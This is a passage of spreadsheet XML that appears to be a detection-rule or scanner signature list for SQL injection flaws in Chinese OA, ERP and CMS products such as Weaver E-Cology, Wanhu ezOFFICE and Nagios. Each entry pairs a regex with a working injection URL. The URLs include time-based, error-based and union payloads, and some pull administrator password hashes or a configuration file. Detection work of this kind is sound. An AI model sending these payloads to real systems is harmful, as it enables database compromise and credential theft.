    <t>/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyWorkView</t>
  </si>
  <si>
    <t>泛微 E-Cology HrmCareerApplyWorkView_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyWorkView\.jsp\?id=1%20union%20select%201%2C2%2C3%2Csys\.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7).*</t>
  </si>
  <si>
    <t>/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1%20union%20select%201%2C2%2C3%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2C5%2C6%2C7</t>
  </si>
  <si>
    <t>泛微 E-Cology login</t>
  </si>
  <si>
    <t>泛微 E-Cology login_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/wui/theme/ecology7/page/login\.jsp\?templateId=1|/wui/theme/ecology7/page/login\.jsp\?templateId=1'%20AND%206120=DBMS_PIPE\.RECEIVE_MESSAGE\(CHR\(68\)|CHR\(102\)|CHR\(119\)|CHR\(86\),5\)%20AND%20'bcBY'='bcBY|/wui/theme/ecology7/page/login\.jsp\?templateId=1'%20and%20\(SELECT%20count\(\*\)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20assys2,%20sysusers%20as%20sys3,%20sysusers%20AS%20sys4,%20sysusers%20AS%20sys5,%20sysusers%20AS%20sys6,sysusers%20AS%20sys7,%20sysusers%20AS%20sys8\)=1%20and%20'1'='1).*</t>
  </si>
  <si>
    <t>/wui/theme/ecology7/page/login.jsp?templateId=1|/wui/theme/ecology7/page/login.jsp?templateId=1'%20AND%206120=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)|CHR(102)|CHR(119)|CHR(86),5)%20AND%20'bcBY'='bcBY|/wui/theme/ecology7/page/login.jsp?templateId=1'%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20assys2,%20sysusers%20as%20sys3,%20sysusers%20AS%20sys4,%20sysusers%20AS%20sys5,%20sysusers%20AS%20sys6,sysusers%20AS%20sys7,%20sysusers%20AS%20sys8)=1%20and%20'1'='1</t>
  </si>
  <si>
    <t>泛微 E-Cology Page</t>
  </si>
  <si>
    <t>泛微 E-Cology Page_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/page/maint/login/Page\.jsp\?templateId=18|/page/maint/login/Page\.jsp\?templateId=18%20waitfor%20delay%20'0:0:5'|/page/maint/login/Page\.jsp\?templateId=18%20and%201=DBMS_PIPE\.RECEIVE_MESSAGE\(CHR\(99\)|CHR\(199\)|CHR\(81\)|CHR\(109\),5\)').*</t>
  </si>
  <si>
    <t>/page/maint/login/Page.jsp?templateId=18|/page/maint/login/Page.jsp?templateId=18%20waitfor%20delay%20'0:0:5'|/page/maint/login/Page.jsp?templateId=18%20and%201=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)|CHR(199)|CHR(81)|CHR(109),5)'</t>
  </si>
  <si>
    <t>.*?(?:/weaver/weaver\.file\.SignatureDownLoad\?markId=1%20union%20select%20%27\.\.%2fecology%2fWEB\-INF%2fprop%2fweaver\.properties%27).*</t>
  </si>
  <si>
    <t>/weaver/weaver.file.SignatureDownLoad?markId=1%20union%20select%20%27..%2fecology%2fWEB-INF%2fprop%2fweaver.properties%27</t>
  </si>
  <si>
    <t>泛微 E-Mobile</t>
  </si>
  <si>
    <t>泛微 E-Mobile_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/E\-mobile/flowimg\.php\?RUN_ID=1%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285%29%29%29LkEu%29).*</t>
  </si>
  <si>
    <t>/E-mobile/flowimg.php?RUN_ID=1%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285%29%29%29LkEu%29</t>
  </si>
  <si>
    <t>泛微 OA SyncUserInfo</t>
  </si>
  <si>
    <t>泛微 OA SyncUserInfo_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/mobile/plugin/SyncUserInfo\.jsp\?userIdentifiers=\-1\)union\(select\(3\),null,null,null,null,null,str\(\{\{randomValue\}\}\),null).*</t>
  </si>
  <si>
    <t>/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{randomValue}}),null</t>
  </si>
  <si>
    <t>泛微 E-Cology 前台</t>
  </si>
  <si>
    <t>泛微 E-Cology 前台_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/js/hrm/getdata\.jsp\?cmd=getSelectAllId\&amp;sql=select\+\{\{randomValue\}\}\+as\+id).*</t>
  </si>
  <si>
    <t>/js/hrm/getdata.jsp?cmd=getSelectAllId&amp;sql=select+{{randomValue}}+as+id</t>
  </si>
  <si>
    <t>泛微E-Office_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/Api/portal/elementEcodeAddon/getSqlData\?sql=select%20@@version).*</t>
  </si>
  <si>
    <t>/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version</t>
  </si>
  <si>
    <t>.*?(?:/js/hrm/getdata\.jsp\?cmd=getSelectAllId\&amp;sql=select\+randomInt\(1000,\ 9999\)\*randomInt\(1000,\ 9999\)\+as\+id).*</t>
  </si>
  <si>
    <t>/js/hrm/getdata.jsp?cmd=getSelectAllId&amp;sql=select+randomInt(1000, 9999)*randomInt(1000, 9999)+as+id</t>
  </si>
  <si>
    <t>泛微 E-Cology系统同步用户信息</t>
  </si>
  <si>
    <t>泛微 E-Cology系统同步用户信息_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/mobile/plugin/SyncUserInfo\.jsp\?userIdentifiers=\-1\)union\(select\(3\),null,null,null,null,null,str\(randomInt\(40000,\ 44800\)\*randomInt\(40000,\ 44800\)\),null).*</t>
  </si>
  <si>
    <t>/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(randomInt(40000, 44800)*randomInt(40000, 44800)),null</t>
  </si>
  <si>
    <t>泛微OA</t>
  </si>
  <si>
    <t>泛微OA_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/js/hrm/getdata\.jsp\?cmd=getSelectAllId\&amp;sql=select%20password%20as%20id%20from%20HrmResourceManager).*</t>
  </si>
  <si>
    <t>/js/hrm/getdata.jsp?cmd=getSelectAllId&amp;sql=select%20password%20as%20id%20from%20HrmResourceManager</t>
  </si>
  <si>
    <t>泛微upgrade</t>
  </si>
  <si>
    <t>泛微upgrade_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/upgrade/detail\.jsp/login/LoginSSO\.jsp\?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager).*</t>
  </si>
  <si>
    <t>/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?m=Goods\&amp;a=showcate\&amp;id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5\(randomInt\(200000000,\ 210000000\)\)%29%23).*</t>
  </si>
  <si>
    <t>/index.php?m=Goods&amp;a=showcate&amp;id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(randomInt(200000000, 210000000))%29%23</t>
  </si>
  <si>
    <t>广联达OA</t>
  </si>
  <si>
    <t>广联达OA_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/Org/service/Service\.asmx/GetUserByUserCode\?userCode=1%27\-1/user\-\-%27\&amp;EncryptData=1).*</t>
  </si>
  <si>
    <t>/Org/service/Service.asmx/GetUserByUserCode?userCode=1%27-1/user--%27&amp;EncryptData=1</t>
  </si>
  <si>
    <t>.*?(?:/comment/api/index\.php\?gid=1\&amp;page=2\&amp;rlist\[\]=@`%27`,%20extractvalue\(1,%20concat_ws\(0x20,%200x5c,\(select%20md5\(202072102\)\)\)\),@`%27`).*</t>
  </si>
  <si>
    <t>/comment/api/index.php?gid=1&amp;page=2&amp;rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`</t>
  </si>
  <si>
    <t>.*?(?:/comment/api/index\.php\?gid=1\&amp;page=2\&amp;type=1\&amp;rlist\[\]=1\)@`%27`union%2d%2d%0aselect%23%0A1,2,3,4,5,6,7,8,9,10,11%23%0Afrom%23%0Asea_admin\-\-%20%27).*</t>
  </si>
  <si>
    <t>/comment/api/index.php?gid=1&amp;page=2&amp;type=1&amp;rlist[]=1)@`%27`union%2d%2d%0aselect%23%0A1,2,3,4,5,6,7,8,9,10,11%23%0Afrom%23%0Asea_admin--%20%27</t>
  </si>
  <si>
    <t>汇高</t>
  </si>
  <si>
    <t>汇高_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/CRMtable/PublicPage/CustomerLogin\.aspx\?id=1%27%20AND%201840%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%20FROM%20master\.\.sysdatabases%20WHERE%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20NOT%20IN%20%28SELECT%20TOP%202%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20master\.\.sysdatabases%20ORDER%20BY%20name%29%20ORDER%20BY%20name%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29\-\-%20OlrO).*</t>
  </si>
  <si>
    <t>/CRMtable/PublicPage/CustomerLogin.aspx?id=1%27%20AND%201840%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%20FROM%20master..sysdatabases%20WHERE%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20NOT%20IN%20%28SELECT%20TOP%202%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20master..sysdatabases%20ORDER%20BY%20name%29%20ORDER%20BY%20name%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29--%20OlrO</t>
  </si>
  <si>
    <t>.*?(?://SM/DingUsers\.aspx\?id=1%20and%201=@@version\-\-\+,).*</t>
  </si>
  <si>
    <t>//SM/DingUsers.aspx?id=1%20and%201=@@version--+,</t>
  </si>
  <si>
    <t>.*?(?:/third/DingTalk/Demo/ShowUserInfo\.aspx\?account=1%27%20AND%201997%20IN%20\(SELECT%20\(CHAR\(113\)\+CHAR\(118\)\+CHAR\(98\)\+CHAR\(118\)\+CHAR\(113\)\+\(SELECT%20\(CASE%20WHEN%20\(1997=1997\)%20THEN%20CHAR\(49\)%20ELSE%20CHAR\(48\)%20END\)\)\+CHAR\(113\)\+CHAR\(112\)\+CHAR\(106\)\+CHAR\(118\)\+CHAR\(113\)\)\)%20AND%20%27jDAx%27=%27jDAx).*</t>
  </si>
  <si>
    <t>/third/DingTalk/Demo/ShowUserInfo.aspx?account=1%27%20AND%201997%20IN%20(SELECT%20(CHAR(113)+CHAR(118)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(1997=1997)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(118)+CHAR(113)))%20AND%20%27jDAx%27=%27jDAx</t>
  </si>
  <si>
    <t>乐知行教务系统</t>
  </si>
  <si>
    <t>乐知行教务系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/datacenter/downloadApp/showInfoEdit\.do\?_1428145745205\&amp;id=dc5593e2e6dd4d2fa4c1651aa2202c99\&amp;time=1428145745185\&amp;type='\+AND\+updatexml\(1,concat\('\~',\(select\+md5\(123\)\)\),1\)\+AND\+'Ramv'%3d'Ramv).*</t>
  </si>
  <si>
    <t>/datacenter/downloadApp/showInfoEdit.do?_1428145745205&amp;id=dc5593e2e6dd4d2fa4c1651aa2202c99&amp;time=1428145745185&amp;type='+AND+updatexml(1,concat('~',(select+md5(123))),1)+AND+'Ramv'%3d'Ramv</t>
  </si>
  <si>
    <t>璐华ruvarOA协同办公系统</t>
  </si>
  <si>
    <t>璐华ruvarOA协同办公系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/WebUtility/SearchCondiction\.aspx\?PageId=1%20and%201=\(CHAR\(113\)%2bCHAR\(122\)%2bCHAR\(122\)%2bCHAR\(107\)%2bCHAR\(113\)%2bCHAR\(122\)%2bCHAR\(122\)%2bCHAR\(107\)%2bCHAR\(113\)\)\-\-).*</t>
  </si>
  <si>
    <t>/WebUtility/SearchCondiction.aspx?PageId=1%20and%201=(CHAR(113)%2bCHAR(122)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(122)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113))--</t>
  </si>
  <si>
    <t>魅思视频系统</t>
  </si>
  <si>
    <t>魅思视频系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/images/lists\?cid=13%20\)%20ORDER%20BY%201%20desc,extractvalue\(rand\(\),concat\(0x7c,md5\(123\),0x7c,user\(\),0x7c,@@version\)\)%20desc%20\-\-%20).*</t>
  </si>
  <si>
    <t>/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,md5(123),0x7c,user(),0x7c,@@version))%20desc%20--%20</t>
  </si>
  <si>
    <t>.*?(?:/images/lists\?cid=1\ \)\ ORDER\ BY\ 1\ desc,extractvalue\(rand\(\),concat\(0x7c,md5\(randomInt\(800000000,\ 1000000000\)\)\)\)\ desc\ \-\-\+a).*</t>
  </si>
  <si>
    <t>/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5(randomInt(800000000, 1000000000)))) desc --+a</t>
  </si>
  <si>
    <t>明源云 ERP VisitorWeb XMLHTTP</t>
  </si>
  <si>
    <t>明源云 ERP VisitorWeb XMLHTTP_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP\.aspx\?ywtype=GetParentProjectName\&amp;ParentCode=1'\+union\+select\+sum\(255\*255\)\-\-\+z).*</t>
  </si>
  <si>
    <t>/CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ywtype=GetParentProjectName&amp;ParentCode=1'+union+select+sum(255*255)--+z</t>
  </si>
  <si>
    <t>齐博CMS</t>
  </si>
  <si>
    <t>齐博CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/f/job\.php\?job=getzone\&amp;typeid=zone\&amp;fup=\.\.\\\.\.\\do\\js\&amp;id=514125\&amp;webdb\[web_open\]=1\&amp;webdb\[cache_time_js\]=\-1\&amp;pre=qb_label%20where%20lid=\-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5\(randomInt\(200000000,\ 210000000\)\),9,10,11,12,13,14,15,16,17,18,19%23).*</t>
  </si>
  <si>
    <t>/f/job.php?job=getzone&amp;typeid=zone&amp;fup=..\..\do\js&amp;id=514125&amp;webdb[web_open]=1&amp;webdb[cache_time_js]=-1&amp;pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(randomInt(200000000, 210000000)),9,10,11,12,13,14,15,16,17,18,19%23</t>
  </si>
  <si>
    <t>启莱</t>
  </si>
  <si>
    <t>启莱_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/client/CloseMsg\.aspx\?user=%27%20and%20\(select%20db_name\(\)\)&gt;0\-\-\&amp;pwd=1).*</t>
  </si>
  <si>
    <t>/client/CloseMsg.aspx?user=%27%20and%20(select%20db_name())&gt;0--&amp;pwd=1</t>
  </si>
  <si>
    <t>.*?(?:/client/checkuser\.aspx\?user=%27and%20@@version&gt;0\-\-\&amp;pwd=1).*</t>
  </si>
  <si>
    <t>/client/checkuser.aspx?user=%27and%20@@version&gt;0--&amp;pwd=1</t>
  </si>
  <si>
    <t>GilaCMS</t>
  </si>
  <si>
    <t>CVE-2020-5515</t>
  </si>
  <si>
    <t>GilaCMS_SQL注入_CVE-2020-5515</t>
  </si>
  <si>
    <t>.*?(?:/admin/sql\?query=SELECT%20md5\(randomInt\(200000000,\ 210000000\)\)).*</t>
  </si>
  <si>
    <t>/admin/sql?query=SELECT%20md5(randomInt(200000000, 210000000))</t>
  </si>
  <si>
    <t>Nagios系统</t>
  </si>
  <si>
    <t>Nagios系统_SQL注入_CVE-2018-10735</t>
  </si>
  <si>
    <t>.*?(?:/nagiosql/admin/commandline\.php\?cname=%27%20union%20select%20concat\(md5\(randomInt\(2000000000,\ 2100000000\)\)\)%23).*</t>
  </si>
  <si>
    <t>/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(randomInt(2000000000, 2100000000)))%23</t>
  </si>
  <si>
    <t>Nagios系统_SQL注入_CVE-2018-10736</t>
  </si>
  <si>
    <t>.*?(?:/nagiosql/admin/info\.php\?key1=%27%20union%20select%20concat\(md5\(randomInt\(2000000000,\ 2100000000\)\)\)%23).*</t>
  </si>
  <si>
    <t>/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(randomInt(2000000000, 2100000000)))%23</t>
  </si>
  <si>
    <t>狮子鱼CMS</t>
  </si>
  <si>
    <t>狮子鱼CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=api/goods_detail\&amp;goods_id=1\ and\ updatexml\(1,concat\(0x7e,md5\(233\),0x7e\),1\)|/index\.php\?s=api/goods_detail\&amp;goods_id=1%20and%20updatexml\(1,concat\(0x7e,md5\(123\),0x7e\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?s=api/goods_detail&amp;goods_id=1 and updatexml(1,concat(0x7e,md5(233),0x7e),1)|/index.php?s=api/goods_detail&amp;goods_id=1%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=apigoods/get_goods_detail\&amp;id=1%20and%20updatexml\(1,concat\(0x7e,md5\(\{\{number\}\}\),0x7e\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?s=apigoods/get_goods_detail&amp;id=1%20and%20updatexml(1,concat(0x7e,md5({{number}}),0x7e),1)</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=api/goods_detail\&amp;goods_id=1%20and%20updatexml\(1,concat\(0x7e,md5\(randomInt\(200000000,\ 210000000\)\),0x7e\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?s=api/goods_detail&amp;goods_id=1%20and%20updatexml(1,concat(0x7e,md5(randomInt(200000000, 210000000)),0x7e),1)</t>
  </si>
  <si>
    <t>天融信</t>
  </si>
  <si>
    <t>天融信_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/acc/bindipmac/static_arp_include\.php\?ifName=123%27%20order%20by%201\-\-|/acc/bindipmac/static_arp_include\.php\?ifName=123%27%20order%20by%202\-\-).*</t>
  </si>
  <si>
    <t>/acc/bindipmac/static_arp_include.php?ifName=123%27%20order%20by%201--|/acc/bindipmac/static_arp_include.php?ifName=123%27%20order%20by%202--</t>
  </si>
  <si>
    <t>.*?(?:/acc/bindipmac/static_arp_setting_content\.php\?arpName=123%27%20UNION%20ALL%20SELECT%20NULL,strftime\(%27%s%27,%272015\-11\-11%27\),NULL,NULL,NULL,NULL,NULL,NULL\-\-).*</t>
  </si>
  <si>
    <t>/acc/bindipmac/static_arp_setting_content.php?arpName=123%27%20UNION%20ALL%20SELECT%20NULL,strftime(%27%s%27,%272015-11-11%27),NULL,NULL,NULL,NULL,NULL,NULL--</t>
  </si>
  <si>
    <t>.*?(?:/interface/auth\.php\?\&amp;PASSWORD=1\&amp;USER_ID=%df%27\ and\ \(select\ 1\ from\ \(select\ count\(\*\),concat\(\(select\ concat\(0x3a,\(select\ database\(\)\)\ ,0x3a\)\ from\ user\ limit\ 1\),floor\(rand\(0\)\*2\)\)x\ from\ \ information_schema\.tables\ group\ by\ x\)a\)%23|/interface/auth\.php\?\&amp;PASSWORD=1\&amp;USER_ID=%df%27\ and\ \(select\ 1\ from\ \(select\ count\(\*\),concat\(\(select\ concat\(0x3a,\(select\ database\(\)\)\ ,0x3a\)\ from\ user\ limit\ 1\),floor\(rand\(0\)\*2\)\)x\ from\ information_schema\.tables\ group\ by\ x\)a\)%23).*</t>
  </si>
  <si>
    <t>/interface/auth.php?&amp;PASSWORD=1&amp;USER_ID=%df%27 and (select 1 from (select count(*),concat((select concat(0x3a,(select database()) ,0x3a) from user limit 1),floor(rand(0)*2))x from  information_schema.tables group by x)a)%23|/interface/auth.php?&amp;PASSWORD=1&amp;USER_ID=%df%27 and (select 1 from (select count(*),concat((select concat(0x3a,(select database()) ,0x3a) from user limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23</t>
  </si>
  <si>
    <t>.*?(?:/interface/ugo\.php\?OA_USER=a%2527%20and%201=\(select%201%20from\(select%20count\(\*\),concat\(\(select%20database\(\)\),0x7c,user\(\),0x7c,floor\(rand\(0\)\*2\)\)x%20from%20information_schema\.tables%20group%20by%20x%20limit%200,1\)a\)%20and%20%25271%2527=%25271).*</t>
  </si>
  <si>
    <t>/interface/ugo.php?OA_USER=a%2527%20and%201=(select%201%20from(select%20count(*),concat((select%20database()),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271</t>
  </si>
  <si>
    <t>.*?(?:/general/score/flow/scoredate/result\.php\?FLOW_ID=11%bf%27%20and%20\(SELECT%201%20from%20\(select%20count\(\*\),concat\(floor\(rand\(0\)\*2\),user\(\),255\*255,\(substring\(\(select%20md5\(255\*255\)\),1,62\)\)\)a%20from%20information_schema\.tables%20group%20by%20a\)b\)%23).*</t>
  </si>
  <si>
    <t>/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),user(),255*255,(substring((select%20md5(255*255)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23</t>
  </si>
  <si>
    <t>万户ezOFFICE</t>
  </si>
  <si>
    <t>万户 ezOFFICE_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/iWebOfficeSign/OfficeServer\.jsp/\.\./\.\./public/iSignatureHTML\.jsp/DocumentEdit\.jsp\?DocumentID=1';WAITFOR%20DELAY%20'0:0:9'\-\-|/defaultroot/iWebOfficeSign/OfficeServer\.jsp/\.\./\.\./public/iSignatureHTML\.jsp/DocumentEdit\.jsp\?DocumentID=1';WAITFOR%20DELAY%20'0:0:6'\-\-|/defaultroot/iWebOfficeSign/OfficeServer\.jsp/\.\./\.\./public/iSignatureHTML\.jsp/DocumentEdit\.jsp\?DocumentID=1';WAITFOR%20DELAY%20'0:0:3'\-\-).*</t>
  </si>
  <si>
    <t>/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:9'--|/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:6'--|/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:3'--</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/platform/bpm/work_flow/process/wf_process_attrelate_aiframe\.jsp;\?fieldId=1;WAITFOR%20DELAY%20%270:0:5%27\-\-).*</t>
  </si>
  <si>
    <t>/defaultroot/platform/bpm/work_flow/process/wf_process_attrelate_aiframe.jsp;?fieldId=1;WAITFOR%20DELAY%20%270:0:5%27--</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/iWebOfficeSign/OfficeServer\.jsp/\.\./\.\./public/iSignatureHTML\.jsp/DocumentEdit\.jsp\?DocumentID=1';WAITFOR%20DELAY%20'0:0:6'\-\-|/defaultroot/iWebOfficeSign/OfficeServer\.jsp/\.\./\.\./public/iSignatureHTML\.jsp/DocumentEdit\.jsp\?DocumentID=1';WAITFOR%20DELAY%20'0:0:9'\-\-|/defaultroot/iWebOfficeSign/OfficeServer\.jsp/\.\./\.\./public/iSignatureHTML\.jsp/DocumentEdit\.jsp\?DocumentID=1';WAITFOR%20DELAY%20'0:0:3'\-\-).*</t>
  </si>
  <si>
    <t>/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:6'--|/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:9'--|/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:3'--</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/public/iWebOfficeSign/DocumentEdit_unite\.jsp;\?RecordID=1'\+UNION\+ALL\+SELECT\+NULL,NULL,NULL,NULL,NULL,NULL,NVL\(CAST\(255\*255\+AS\+VARCHAR\(4000\)\),CHR\(32\)\),NULL,NULL,NULL\+FROM\+DUAL\-\-\+1).*</t>
  </si>
  <si>
    <t>/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NVL(CAST(255*255+AS+VARCHAR(4000)),CHR(32)),NULL,NULL,NULL+FROM+DUAL--+1</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit\.jsp;xc\?RecordID=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%28113%29%2BISNULL%28CAST%28DB_NAME%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29\-\-%20rOwP).*</t>
  </si>
  <si>
    <t>/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%28113%29%2BISNULL%28CAST%28DB_NAME%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29--%20rOwP</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/wpsservlet\?option=getSignPicture\&amp;signatureID=1;WAITFOR%20DELAY%20'0:0:3'\-\-).*</t>
  </si>
  <si>
    <t>/defaultroot/wpsservlet?option=getSignPicture&amp;signatureID=1;WAITFOR%20DELAY%20'0:0:3'--</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/wpsservlet\?option=getSign\&amp;userId=1;WAITFOR%20DELAY%20%270:0:5%27\-\-\&amp;orgIdString=1\&amp;domainId=1).*</t>
  </si>
  <si>
    <t>/defaultroot/wpsservlet?option=getSign&amp;userId=1;WAITFOR%20DELAY%20%270:0:5%27--&amp;orgIdString=1&amp;domainId=1</t>
  </si>
  <si>
    <t>万户OA</t>
  </si>
  <si>
    <t>万户OA_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/DossierBorrowAction\.do\?action=load\&amp;record=1;WAITFOR\ DELAY\+"0:0:5"\-\-\+\-).*</t>
  </si>
  <si>
    <t>/defaultroot/DossierBorrowAction.do?action=load&amp;record=1;WAITFOR DELAY+"0:0:5"--+-</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/GovDocumentDossierAction\.do\?flag=sendFile\&amp;id=1;WAITFOR\+DELAY\+'0:0:5'\-\-\+\-).*</t>
  </si>
  <si>
    <t>/defaultroot/GovDocumentDossierAction.do?flag=sendFile&amp;id=1|/defaultroot/GovDocumentDossierAction.do?flag=sendFile&amp;id=1;WAITFOR+DELAY+'0:0:5'--+-</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/GovSendFileAction\.do\?action=listLoad\&amp;editId=2|/defaultroot/GovSendFileAction\.do\?action=listLoad\&amp;editId=2%20AND%209847%3DDBMS_PIPE\.RECEIVE_MESSAGE%28CHR%2871%29%7C%7CCHR%28114%29%7C%7CCHR%28114%29%7C%7CCHR%2871%29%2C5%29).*</t>
  </si>
  <si>
